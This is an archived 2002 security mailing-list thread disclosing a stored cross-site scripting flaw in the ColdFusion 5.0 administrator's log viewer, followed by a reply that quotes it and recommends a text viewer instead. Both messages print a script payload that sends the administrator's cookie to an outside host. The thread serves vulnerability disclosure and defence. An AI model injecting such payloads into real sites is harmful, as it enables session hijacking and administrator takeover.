PDA

Bekijk Volledige Versie : Cross-site scripting vulnerability in CF 5.0



KiLL CoLe
16/12/02, 21:34
Cross-site scripting vulnerability in CF 5.0. This
issue was brought up to macromedia on July 22nd, 2002.
Macromedia issued a fix to me, but I have not seen the
fix available to the public. the coldfusion
administrator allows you to view your application log
via your web browser. Under certain conditions, it is
possible to remotely alter coldfusions application
log. take the following code:

<CFQUERY NAME="qProducts" DATASOURCE="#datasrc#">
SELECT * FROM Products
Where ProductId = #int(url.productid)#
</CFQUERY>

if the INT function encounters a value that is not
numeric, it throws an exception and writes the value
that was passed to application.log. Should an
unsuspecting administrator view the log file via their
web browser, script could be executed. Analyze this
code:
if url.productid (from the above example) were passed
in as:

<iframe name="frame1" width="0" height="0"></iframe>
<script>document.frame1.location="http://www.domain.com/index.cfm?stealcookie="
+ document.cookie</script>

this would enable an attacker to steal the value of
the coldfusion administrators cookie. Decrypting the
coldfusion admin's password is well documented, and
exposes a mild-moderate threat to server security.

**NOTE: there are dozens of other functions that throw
exceptions similar to the INT function.

__________________________________________________
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
http://mailplus.yahoo.com

16/12/02, 22:06
Something to note:

The 'view admin log' feature in CF tends to cause stress on the CF
process, and also blocks the log file during opening.

So, It's generally a better (and safer, with this cross-site scripting
problem that's been around for years) to view the logs file via a text
viewer on the sytem.

By default, it's c:\cfusion\log\*.log


On Mon, 16 Dec 2002, KiLL CoLe wrote:

> Cross-site scripting vulnerability in CF 5.0. This
> issue was brought up to macromedia on July 22nd, 2002.
> Macromedia issued a fix to me, but I have not seen the
> fix available to the public. the coldfusion
> administrator allows you to view your application log
> via your web browser. Under certain conditions, it is
> possible to remotely alter coldfusions application
> log. take the following code:
>
> <CFQUERY NAME="qProducts" DATASOURCE="#datasrc#">
> SELECT * FROM Products
> Where ProductId = #int(url.productid)#
> </CFQUERY>
>
> if the INT function encounters a value that is not
> numeric, it throws an exception and writes the value
> that was passed to application.log. Should an
> unsuspecting administrator view the log file via their
> web browser, script could be executed. Analyze this
> code:
> if url.productid (from the above example) were passed
> in as:
>
> <iframe name="frame1" width="0" height="0"></iframe>
> <script>document.frame1.location="http://www.domain.com/index.cfm?stealcookie="
> + document.cookie</script>
>
> this would enable an attacker to steal the value of
> the coldfusion administrators cookie. Decrypting the
> coldfusion admin's password is well documented, and
> exposes a mild-moderate threat to server security.
>
> **NOTE: there are dozens of other functions that throw
> exceptions similar to the INT function.
>
> __________________________________________________
> Do you Yahoo!?
> Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
> http://mailplus.yahoo.com
>
>